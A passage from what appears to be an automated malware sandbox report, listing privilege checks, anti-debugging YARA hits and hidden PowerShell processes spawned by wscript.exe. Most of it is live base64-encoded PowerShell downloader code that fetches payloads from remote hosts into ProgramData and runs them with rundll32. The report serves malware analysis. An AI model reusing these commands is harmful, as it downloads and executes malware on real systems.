G4AdABUAGgAaQByAHQAaQBlAHMAIgA7AHQAcgB5ACAAewAkAHUAbgByAGUAYwBrAG8AbgBlAGQATABpAHAAbwBjAGwAYQBzAGkAcwAgAD0AIAAiAFQAbwBsAGwAdABhAGsAZQByACIAOwAkAFIAZQBzAHUAcABpAG4AYQB0AGkAbwBuACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABFAEEATgBBAEEAMABBAEMANABBAE0AZwBBAHcAQQBEAFEAQQBMAGcAQQB5AEEARABBAEEATQBnAEEAdQBBAEQARQBBAE0AdwBBADMAQQBBAD0APQAiADsAJABzAGkAdABvAHQAbwB4AGkAcwBtACAAPQAgAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAbgBpAGMAbwBkAGUALgBHAGUAdABTAHQAcgBpAG4AZwAoAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAkAGQAZQBzAGkAbABpAGMAbwBuAGkAegBlACkAKQA7AHcAZwBlAHQAIAAkAHMAaQB0AG8AdABvAHgAaQBzAG0AIAAtAE8AIABDADoAXABQAHIAbwBnAHIAYQBtAEQAYQB0AGEAXABzAGUAbQBpAHMAbwBsAGUAbQBuAG4AZQBzAHMALgBHAHIAZQBmAGYAbwB0AG8AbQBlAEMAYQBuAGEAbgBnAGkAdQBtADsAJABwAGwAYQBuAG8AZwByAGEAcABoAGkAcwB0ACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQAyAEEARABBAEEATABnAEEAeABBAEQAawBBAE0AZwBBAHUAQQBEAEkAQQBOAFEAQQB5AEEAQwA0AEEATgBRAEEAMABBAEEAPQA9AGcAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB5AEEARABFAEEATQBnAEEAdQBBAEQASQBBAE4AQQBBAHgAQQBDADQAQQBNAFEAQQAzAEEARABZAEEATABnAEEAeABBAEQASQBBAE0AUQBBAD0AZwBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBGAFUAQQBiAGcAQgBuAEEARwBVAEEAYgBnAEIAbABBAEgASQBBAFkAUQBCAHMAQQBGAFUAQQBiAGcAQgBqAEEARwA4AEEAYgBnAEIAMgBBAEcAVQBBAGIAZwBCAHAAQQBHAFUAQQBiAGcAQgAwAEEAQwA0AEEAWQB3AEIAaABBAEcAWQBBAFoAUQBBAD0AIgA7ACQAZABhAHkAYgBvAG8AawBJAG4AZgBpAG4AaQB0AGEAdABpAG4AZwAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIAQgBBAEgAVQBBAGQAQQBCAHYAQQBHAEUAQQBiAGcAQgAwAEEARwBrAEEAWQBnAEIAdgBBAEcAUQBBAGUAUQBBAHUAQQBIAEkAQQBaAFEAQgBwAEEASABNAEEAWgBRAEIAdQBBAEEAPQA9AEYAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABJAEEATgBRAEEAeABBAEMANABBAE4AQQBBAHoAQQBDADQAQQBNAFEAQQB4AEEARABrAEEATABnAEEAeABBAEQATQBBAE8AQQBBAD0ARgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCAHkAQQBHAFUAQQBkAEEAQgBsAEEASABNAEEAZABBAEIAcABBAEcAMABBAGIAdwBCAHUAQQBHAGsAQQBaAFEAQgB6AEEARgBNAEEAWQBRAEIAcwBBAEgAQQBBAGEAUQBCAHUAQQBHAGMAQQBiAHcAQgB3AEEARwBFAEEAYgBBAEIAaABBAEgAUQBBAGEAUQBCAHUAQQBHAFUAQQBMAGcAQgAzAEEARwBrAEEAYQB3AEIAcABBAEEAPQA9AEYAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARwAwAEEAYQBRAEIAegBBAEcARQBBAFoAQQBCADIAQQBHAFUAQQBjAGcAQgAwAEEARwBVAEEAYgBnAEIAagBBAEcAVQBBAFUAdwBCADAAQQBIAGsAQQBiAEEAQgB2AEEARwA0AEEAZQBRAEIAagBBAEcAZwBBAGEAUQBCAGgAQQBDADQAQQBkAGcAQgBqAEEAQQA9AD0AIgA7ACQAcwBlAG0AaQBuAGkAdQBtAEcAZQBvAGQAaQBzAHQAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBGAFEAQQBhAEEAQgBwAEEARwA4AEEAYgBnAEIAcABBAEcANABBAFoAUQBBAHUAQQBHAE0AQQBiAEEAQgBwAEEARwBNAEEAYQB3AEEAPQB0AFkAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABJAEEATgBBAEEAMwBBAEMANABBAE0AZwBBADAAQQBEAGsAQQBMAGcAQQB4AEEARABnAEEATQBRAEEAdQBBAEQASQBBAE0AZwBBAHgAQQBBAD0APQB0AFkAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABFAEEATQBBAEEAMgBBAEMANABBAE0AUQBBADUAQQBEAFkAQQBMAGcAQQB5AEEARABBAEEATQB3AEEAdQBBAEQARQBBAE0AUQBBADMAQQBBAD0APQAiADsAaQBmACAAKAAoAEcAZQB0AC0ASQB0AGUAbQAgAC0AUABhAHQAaAAgAEMAOgBcAFAAcgBvAGcAcgBhAG0ARABhAHQAYQBcAHMAZQBtAGkAcwBvAGwAZQBtAG4AbgBlAHMAcwAuAEcAcgBlAGYAZgBvAHQAbwBtAGUAQwBhAG4AYQBuAGcAaQB1AG0AKQAuAEwAZQBuAGcAdABoACAALQBnAGUAIAAxADQANwA5ADQANAApAHsAcABvAHcAZQByAHMAaABlAGwAbAAgAC0AZQBuAGMAbwBkAGUAZABjAG8AbQBtAGEAbgBkACAAIgBjAHcAQgAwAEEARwBFAEEAYwBnAEIAMABBAEMAQQBBAGMAZwBCADEAQQBHADQAQQBaAEEAQgBzAEEARwB3AEEATQB3AEEAeQBBAEMAQQBBAFEAdwBBADYAQQBGAHcAQQBVAEEAQgB5AEEARwA4AEEAWgB3AEIAeQBBAEcARQBBAGIAUQBCAEUAQQBHAEUAQQBkAEEAQgBoAEEARgB3AEEAYwB3AEIAbABBAEcAMABBAGEAUQBCAHoAQQBHADgAQQBiAEEAQgBsAEEARwAwAEEAYgBnAEIAdQBBAEcAVQBBAGMAdwBCAHoAQQBDADQAQQBSAHcAQgB5AEEARwBVAEEAWgBnAEIAbQBBAEcAOABBAGQAQQBCAHYAQQBHADAAQQBaAFEAQgBEAEEARwBFAEEAYgBnAEIAaABBAEcANABBAFoAdwBCAHAAQQBIAFUAQQBiAFEAQQBzAEEASABBAEEAYwBnAEIAcABBAEcANABBAGQAQQBBADcAQQBBAD0APQAiADsAJABPAHUAdABwAGwAbwBkAGQAZQBkACAAPQAgACIAdgBpAHQAbwBjAGgAZQBtAGkAYwBhAGwAIgA7ACQAZwByAGEAbgBkAGUAdgBpAHQAeQAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIAaQBBAEcAdwBBAGIAdwBCAGoAQQBHAHMAQQBhAFEAQgB1AEEARwBjAEEAVABBAEIAbABBAEgAQQBBAGEAUQBCAGsAQQBHADgAQQBiAEEAQgBwAEEASABRAEEAWgBRAEEAdQBBAEcAawBBAGIAZwBCAHIAQQBBAD0APQBuAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAVQBBAE4AZwBBAHUAQQBEAEkAQQBNAFEAQQB6AEEAQwA0AEEATQBnAEEAeABBAEQAUQBBAEwAZwBBADEAQQBEAE0AQQBuAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEgAQQBBAGMAZwBCAGwAQQBIAEEAQQBZAFEAQgBzAEEARwBFAEEAWgBRAEIAdgBBAEcAdwBBAGEAUQBCADAAQQBHAGcAQQBhAFEAQgBqAEEAQwA0AEEAYwBBAEIAaABBAEgASQBBAGQAQQBCAHUAQQBHAFUAQQBjAGcAQgB6AEEAQQA9AD0AbgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBHAE0AQQBiAHcAQgB1AEEARwBNAEEAWgBRAEIAeQBBAEcANABBAFoAUQBCAGsAQQBHADQAQQBaAFEAQgB6AEEASABNAEEATABnAEIAdABBAEcAOABBAGIAUQBBAD0AIgA7AGIAcgBlAGEAawA7AH0AUgBlAGEAYwB0AEQATwBNADsAfQAgAGMAYQB0AGMAaAAgAHsAJABBAGQAaQBnAGUAaQBUAGgAeQBzAGUAbgAgAD0AIAAiAGEAdgBpAGEAbgBpAHoAZQBkAEIAbABhAHMAdABvAGMAaABlAG0AZQAiADsAJABIAHkAcABlAHIAZABpAHYAaQBzAGkAbwBuACAAPQAgACIAcABhAHIAYQBmAGwAbwBjAGMAdQBsAGEAcgAiADsAJABBAGMAZQB0AHkAbABjAHkAYQBuAGkAZABlAFEAdQBpAGQAZABsAGkAbgBnACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgBGAEEASABnAEEAYwBBAEIAcwBBAEcAOABBAGEAUQBCADAAQQBFAE0AQQBiAHcAQgB5AEEASABNAEEAWgBRAEIAcwBBAEcAVQBBAGQAQQBCAGwAQQBHAFEAQQBMAGcAQgBwAEEARwA0AEEAZABBAEIAbABBAEgASQBBAGIAZwBCAGgAQQBIAFEAQQBhAFEAQgB2AEEARwA0AEEAWQBRAEIAcwBBAEEAPQA9AHYARgBSAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAVQBBAE8AUQBBAHUAQQBEAEUAQQBOAFEAQQAyAEEAQwA0AEEATQBRAEEAMQBBAEQAZwBBAEwAZwBBAHgAQQBEAGMAQQBOAFEAQQA9ACIAOwB9AH0AJAB0AGEAcgBhAHAAbwBuACAAPQAgACIAQQBuAHQAbABlAHIAcwBCAGEAZQBkAGUAawBlAHIAaQBhAG4AIgA7ACQAdABvAGwAegBlAHkAVQBuAHMAdAByAHUAYwB0AHUAcgBhAGwAIAA9ACAANQA2ADIAOwAkAFMAbwBhAHIAaQBuAGcAcwBSAGUAZQBuAHUAbgBjAGkAYQB0AGUAZAAgAD0AIAAiAHYAZQByAHIAdQBjAG8AdQBzACIAOwA=" filepath: powershell	1	1

Checks for the Locally Unique Identifier on the system for a suspicious privilege (1 event)

Time & API	Arguments	Status	Return	Repeated
LookupPrivilegeValueW May 12, 2023, 9:27 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1	0

Yara rule detected in process memory (16 events)

description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Checks if being debugged	rule	anti_dbg
description	Bypass DEP	rule	disable_dep
description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Checks if being debugged	rule	anti_dbg
description	Bypass DEP	rule	disable_dep

One or more non-whitelisted processes were created (4 events)

parent_process	wscript.exe	martian_process	powershell -WindowStyle Hidden -ExecutionPolicy Bypass -NoLogo -NoProfile -encodedcommand "JABiAGEAcgBiAGEAcgBpAG8AdQBzAG4AZQBzAHMASABvAHIAbgBwAGkAcABlAHMAIAA9ACAAIgBhAGcAZwByAGEAYwBlAE0AbwBuAGcAaABvAGwAIgA7ACQAQgBhAGcAcgBvAG8AbQBXAGgAaQBtAHMAaQBjACAAPQAgADgAMAA7AFMAdABhAHIAdAAtAFMAbABlAGUAcAAgAC0AUwBlAGMAbwBuAGQAcwAgADEAMgA7ACQAUQB1AGkAZABuAHUAbgBjACAAPQAgACIATQBpAGwAbABpAG0AaQBjAHIAbwBuACIAOwAkAGIAcgBhAHQAaQBuAGEAQQBiAHMAaQBuAHQAaABlAHMAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBADMAQQBEAGsAQQBMAGcAQQB4AEEARABNAEEATgB3AEEAdQBBAEQASQBBAE4AQQBBADQAQQBDADQAQQBNAFEAQQAyAEEARABNAEEATAB3AEIAWQBBAEcANABBAFUAUQBCAGsAQQBEAEkAQQBZAGcAQgBNAEEAQwA4AEEAUgB3AEIAUwBBAEUARQBBAFMAUQBBAHoAQQBIAGMAQQBkAFEAQgByAEEAQQA9AD0AYwBPAD0ATgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBADMAQQBEAGMAQQBMAGcAQQA1AEEARABFAEEATABnAEEANABBAEQAYwBBAEwAZwBBAHgAQQBEAGsAQQBPAEEAQQB2AEEASABFAEEAWgBnAEIAaQBBAEcAWQBBAGQAUQBBAHYAQQBFAGcAQQBNAEEAQgA0AEEARQBZAEEATQBnAEEAPQBjAE8APQBOAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEANQBBAEQARQBBAEwAZwBBAHgAQQBEAGsAQQBNAHcAQQB1AEEARABRAEEATQB3AEEAdQBBAEQAawBBAE8AQQBBAHYAQQBFAEUAQQBSAHcAQgAyAEEARgBvAEEAYQBBAEEANABBAEUATQBBAEwAdwBCAHoAQQBEAEkAQQBhAFEAQgBaAEEASABFAEEAVABRAEEAPQBjAE8APQBOAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAMwBBAEQAYwBBAEwAZwBBADUAQQBEAEUAQQBMAGcAQQA0AEEARABjAEEATABnAEEAeABBAEQAVQBBAE8AQQBBAHYAQQBIAFUAQQBWAGcAQgAzAEEARwAwAEEATQBBAEIAQgBBAEMAOABBAFoAQQBCAEoAQQBFAGMAQQBVAHcAQgBGAEEARQBRAEEAYwBPAD0ATgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBADUAQQBEAEUAQQBMAGcAQQB4AEEARABrAEEATQB3AEEAdQBBAEQAUQBBAE0AdwBBAHUAQQBEAEUAQQBNAEEAQQB4AEEAQwA4AEEAYQBBAEEAMwBBAEQARQBBAEwAdwBCAGoAQQBGAFkAQQBNAFEAQgBKAEEARABrAEEAVwBnAEIANgBBAEcAYwBBAGQAUQBBAD0AIgA7AGYAbwByAGUAYQBjAGgAIAAoACQAZABlAHMAaQBsAGkAYwBvAG4AaQB6AGUAIABpAG4AIAAkAGIAcgBhAHQAaQBuAGEAQQBiAHMAaQBuAHQAaABlAHMAIAAtAHMAcABsAGkAdAAgACIAYwBPAD0ATgAiACkAIAB7ACQAdgBpAHIAZwB1AGwAYQB0AGUAQQBsAGkAYwBhAG4AdAAgAD0AIAAiAHAAbwBrAGUAYgBlAHIAcgBpAGUAcwBIAHkAbgBkAGUAcgAiADsAJABDAHIAYQBuAGUAeQAgAD0AIAAiAHMAZQBtAGkAYwBvAG4AdgBlAHIAZwBlAG4AdABUAGgAaQByAHQAaQBlAHMAIgA7AHQAcgB5ACAAewAkAHUAbgByAGUAYwBrAG8AbgBlAGQATABpAHAAbwBjAGwAYQBzAGkAcwAgAD0AIAAiAFQAbwBsAGwAdABhAGsAZQByACIAOwAkAFIAZQBzAHUAcABpAG4AYQB0AGkAbwBuACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABFAEEATgBBAEEAMABBAEMANABBAE0AZwBBAHcAQQBEAFEAQQBMAGcAQQB5AEEARABBAEEATQBnAEEAdQBBAEQARQBBAE0AdwBBADMAQQBBAD0APQAiADsAJABzAGkAdABvAHQAbwB4AGkAcwBtACAAPQAgAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAbgBpAGMAbwBkAGUALgBHAGUAdABTAHQAcgBpAG4AZwAoAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAkAGQAZQBzAGkAbABpAGMAbwBuAGkAegBlACkAKQA7AHcAZwBlAHQAIAAkAHMAaQB0AG8AdABvAHgAaQBzAG0AIAAtAE8AIABDADoAXABQAHIAbwBnAHIAYQBtAEQAYQB0AGEAXABzAGUAbQBpAHMAbwBsAGUAbQBuAG4AZQBzAHMALgBHAHIAZQBmAGYAbwB0AG8AbQBlAEMAYQBuAGEAbgBnAGkAdQBtADsAJABwAGwAYQBuAG8AZwByAGEAcABoAGkAcwB0ACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQAyAEEARABBAEEATABnAEEAeABBAEQAawBBAE0AZwBBAHUAQQBEAEkAQQBOAFEAQQB5AEEAQwA0AEEATgBRAEEAMABBAEEAPQA9AGcAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB5AEEARABFAEEATQBnAEEAdQBBAEQASQBBAE4AQQBBAHgAQQBDADQAQQBNAFEAQQAzAEEARABZAEEATABnAEEAeABBAEQASQBBAE0AUQBBAD0AZwBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBGAFUAQQBiAGcAQgBuAEEARwBVAEEAYgBnAEIAbABBAEgASQBBAFkAUQBCAHMAQQBGAFUAQQBiAGcAQgBqAEEARwA4AEEAYgBnAEIAMgBBAEcAVQBBAGIAZwBCAHAAQQBHAFUAQQBiAGcAQgAwAEEAQwA0AEEAWQB3AEIAaABBAEcAWQBBAFoAUQBBAD0AIgA7ACQAZABhAHkAYgBvAG8AawBJAG4AZgBpAG4AaQB0AGEAdABpAG4AZwAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIAQgBBAEgAVQBBAGQAQQBCAHYAQQBHAEUAQQBiAGcAQgAwAEEARwBrAEEAWQBnAEIAdgBBAEcAUQBBAGUAUQBBAHUAQQBIAEkAQQBaAFEAQgBwAEEASABNAEEAWgBRAEIAdQBBAEEAPQA9AEYAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABJAEEATgBRAEEAeABBAEMANABBAE4AQQBBAHoAQQBDADQAQQBNAFEAQQB4AEEARABrAEEATABnAEEAeABBAEQATQBBAE8AQQBBAD0ARgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCAHkAQQBHAFUAQQBkAEEAQgBsAEEASABNAEEAZABBAEIAcABBAEcAMABBAGIAdwBCAHUAQQBHAGsAQQBaAFEAQgB6AEEARgBNAEEAWQBRAEIAcwBBAEgAQQBBAGEAUQBCAHUAQQBHAGMAQQBiAHcAQgB3AEEARwBFAEEAYgBBAEIAaABBAEgAUQBBAGEAUQBCAHUAQQBHAFUAQQBMAGcAQgAzAEEARwBrAEEAYQB3AEIAcABBAEEAPQA9AEYAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARwAwAEEAYQBRAEIAegBBAEcARQBBAFoAQQBCADIAQQBHAFUAQQBjAGcAQgAwAEEARwBVAEEAYgBnAEIAagBBAEcAVQBBAFUAdwBCADAAQQBIAGsAQQBiAEEAQgB2AEEARwA0AEEAZQBRAEIAagBBAEcAZwBBAGEAUQBCAGgAQQBDADQAQQBkAGcAQgBqAEEAQQA9AD0AIgA7ACQAcwBlAG0AaQBuAGkAdQBtAEcAZQBvAGQAaQBzAHQAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBGAFEAQQBhAEEAQgBwAEEARwA4AEEAYgBnAEIAcABBAEcANABBAFoAUQBBAHUAQQBHAE0AQQBiAEEAQgBwAEEARwBNAEEAYQB3AEEAPQB0AFkAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABJAEEATgBBAEEAMwBBAEMANABBAE0AZwBBADAAQQBEAGsAQQBMAGcAQQB4AEEARABnAEEATQBRAEEAdQBBAEQASQBBAE0AZwBBAHgAQQBBAD0APQB0AFkAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABFAEEATQBBAEEAMgBBAEMANABBAE0AUQBBADUAQQBEAFkAQQBMAGcAQQB5AEEARABBAEEATQB3AEEAdQBBAEQARQBBAE0AUQBBADMAQQBBAD0APQAiADsAaQBmACAAKAAoAEcAZQB0AC0ASQB0AGUAbQAgAC0AUABhAHQAaAAgAEMAOgBcAFAAcgBvAGcAcgBhAG0ARABhAHQAYQBcAHMAZQBtAGkAcwBvAGwAZQBtAG4AbgBlAHMAcwAuAEcAcgBlAGYAZgBvAHQAbwBtAGUAQwBhAG4AYQBuAGcAaQB1AG0AKQAuAEwAZQBuAGcAdABoACAALQBnAGUAIAAxADQANwA5ADQANAApAHsAcABvAHcAZQByAHMAaABlAGwAbAAgAC0AZQBuAGMAbwBkAGUAZABjAG8AbQBtAGEAbgBkACAAIgBjAHcAQgAwAEEARwBFAEEAYwBnAEIAMABBAEMAQQBBAGMAZwBCADEAQQBHADQAQQBaAEEAQgBzAEEARwB3AEEATQB3AEEAeQBBAEMAQQBBAFEAdwBBADYAQQBGAHcAQQBVAEEAQgB5AEEARwA4AEEAWgB3AEIAeQBBAEcARQBBAGIAUQBCAEUAQQBHAEUAQQBkAEEAQgBoAEEARgB3AEEAYwB3AEIAbABBAEcAMABBAGEAUQBCAHoAQQBHADgAQQBiAEEAQgBsAEEARwAwAEEAYgBnAEIAdQBBAEcAVQBBAGMAdwBCAHoAQQBDADQAQQBSAHcAQgB5AEEARwBVAEEAWgBnAEIAbQBBAEcAOABBAGQAQQBCAHYAQQBHADAAQQBaAFEAQgBEAEEARwBFAEEAYgBnAEIAaABBAEcANABBAFoAdwBCAHAAQQBIAFUAQQBiAFEAQQBzAEEASABBAEEAYwBnAEIAcABBAEcANABBAGQAQQBBADcAQQBBAD0APQAiADsAJABPAHUAdABwAGwAbwBkAGQAZQBkACAAPQAgACIAdgBpAHQAbwBjAGgAZQBtAGkAYwBhAGwAIgA7ACQAZwByAGEAbgBkAGUAdgBpAHQAeQAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIAaQBBAEcAdwBBAGIAdwBCAGoAQQBHAHMAQQBhAFEAQgB1AEEARwBjAEEAVABBAEIAbABBAEgAQQBBAGEAUQBCAGsAQQBHADgAQQBiAEEAQgBwAEEASABRAEEAWgBRAEEAdQBBAEcAawBBAGIAZwBCAHIAQQBBAD0APQBuAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAVQBBAE4AZwBBAHUAQQBEAEkAQQBNAFEAQQB6AEEAQwA0AEEATQBnAEEAeABBAEQAUQBBAEwAZwBBADEAQQBEAE0AQQBuAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEgAQQBBAGMAZwBCAGwAQQBIAEEAQQBZAFEAQgBzAEEARwBFAEEAWgBRAEIAdgBBAEcAdwBBAGEAUQBCADAAQQBHAGcAQQBhAFEAQgBqAEEAQwA0AEEAYwBBAEIAaABBAEgASQBBAGQAQQBCAHUAQQBHAFUAQQBjAGcAQgB6AEEAQQA9AD0AbgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBHAE0AQQBiAHcAQgB1AEEARwBNAEEAWgBRAEIAeQBBAEcANABBAFoAUQBCAGsAQQBHADQAQQBaAFEAQgB6AEEASABNAEEATABnAEIAdABBAEcAOABBAGIAUQBBAD0AIgA7AGIAcgBlAGEAawA7AH0AUgBlAGEAYwB0AEQATwBNADsAfQAgAGMAYQB0AGMAaAAgAHsAJABBAGQAaQBnAGUAaQBUAGgAeQBzAGUAbgAgAD0AIAAiAGEAdgBpAGEAbgBpAHoAZQBkAEIAbABhAHMAdABvAGMAaABlAG0AZQAiADsAJABIAHkAcABlAHIAZABpAHYAaQBzAGkAbwBuACAAPQAgACIAcABhAHIAYQBmAGwAbwBjAGMAdQBsAGEAcgAiADsAJABBAGMAZQB0AHkAbABjAHkAYQBuAGkAZABlAFEAdQBpAGQAZABsAGkAbgBnACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgBGAEEASABnAEEAYwBBAEIAcwBBAEcAOABBAGEAUQBCADAAQQBFAE0AQQBiAHcAQgB5AEEASABNAEEAWgBRAEIAcwBBAEcAVQBBAGQAQQBCAGwAQQBHAFEAQQBMAGcAQgBwAEEARwA0AEEAZABBAEIAbABBAEgASQBBAGIAZwBCAGgAQQBIAFEAQQBhAFEAQgB2AEEARwA0AEEAWQBRAEIAcwBBAEEAPQA9AHYARgBSAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAVQBBAE8AUQBBAHUAQQBEAEUAQQBOAFEAQQAyAEEAQwA0AEEATQBRAEEAMQBBAEQAZwBBAEwAZwBBAHgAQQBEAGMAQQBOAFEAQQA9ACIAOwB9AH0AJAB0AGEAcgBhAHAAbwBuACAAPQAgACIAQQBuAHQAbABlAHIAcwBCAGEAZQBkAGUAawBlAHIAaQBhAG4AIgA7ACQAdABvAGwAegBlAHkAVQBuAHMAdAByAHUAYwB0AHUAcgBhAGwAIAA9ACAANQA2ADIAOwAkAFMAbwBhAHIAaQBuAGcAcwBSAGUAZQBuAHUAbgBjAGkAYQB0AGUAZAAgAD0AIAAiAHYAZQByAHIAdQBjAG8AdQBzACIAOwA="
parent_process	wscript.exe	martian_process	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -ExecutionPolicy Bypass -NoLogo -NoProfile -encodedcommand "JABiAGEAcgBiAGEAcgBpAG8AdQBzAG4AZQBzAHMASABvAHIAbgBwAGkAcABlAHMAIAA9ACAAIgBhAGcAZwByAGEAYwBlAE0AbwBuAGcAaABvAGwAIgA7ACQAQgBhAGcAcgBvAG8AbQBXAGgAaQBtAHMAaQBjACAAPQAgADgAMAA7AFMAdABhAHIAdAAtAFMAbABlAGUAcAAgAC0AUwBlAGMAbwBuAGQAcwAgADEAMgA7ACQAUQB1AGkAZABuAHUAbgBjACAAPQAgACIATQBpAGwAbABpAG0AaQBjAHIAbwBuACIAOwAkAGIAcgBhAHQAaQBuAGEAQQBiAHMAaQBuAHQAaABlAHMAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBADMAQQBEAGsAQQBMAGcAQQB4AEEARABNAEEATgB3AEEAdQBBAEQASQBBAE4AQQBBADQAQQBDADQAQQBNAFEAQQAyAEEARABNAEEATAB3AEIAWQBBAEcANABBAFUAUQBCAGsAQQBEAEkAQQBZAGcAQgBNAEEAQwA4AEEAUgB3AEIAUwBBAEUARQBBAFMAUQBBAHoAQQBIAGMAQQBkAFEAQgByAEEAQQA9AD0AYwBPAD0ATgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBADMAQQBEAGMAQQBMAGcAQQA1AEEARABFAEEATABnAEEANABBAEQAYwBBAEwAZwBBAHgAQQBEAGsAQQBPAEEAQQB2AEEASABFAEEAWgBnAEIAaQBBAEcAWQBBAGQAUQBBAHYAQQBFAGcAQQBNAEEAQgA0AEEARQBZAEEATQBnAEEAPQBjAE8APQBOAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEANQBBAEQARQBBAEwAZwBBAHgAQQBEAGsAQQBNAHcAQQB1AEEARABRAEEATQB3AEEAdQBBAEQAawBBAE8AQQBBAHYAQQBFAEUAQQBSAHcAQgAyAEEARgBvAEEAYQBBAEEANABBAEUATQBBAEwAdwBCAHoAQQBEAEkAQQBhAFEAQgBaAEEASABFAEEAVABRAEEAPQBjAE8APQBOAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAMwBBAEQAYwBBAEwAZwBBADUAQQBEAEUAQQBMAGcAQQA0AEEARABjAEEATABnAEEAeABBAEQAVQBBAE8AQQBBAHYAQQBIAFUAQQBWAGcAQgAzAEEARwAwAEEATQBBAEIAQgBBAEMAOABBAFoAQQBCAEoAQQBFAGMAQQBVAHcAQgBGAEEARQBRAEEAYwBPAD0ATgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBADUAQQBEAEUAQQBMAGcAQQB4AEEARABrAEEATQB3AEEAdQBBAEQAUQBBAE0AdwBBAHUAQQBEAEUAQQBNAEEAQQB4AEEAQwA4AEEAYQBBAEEAMwBBAEQARQBBAEwAdwBCAGoAQQBGAFkAQQBNAF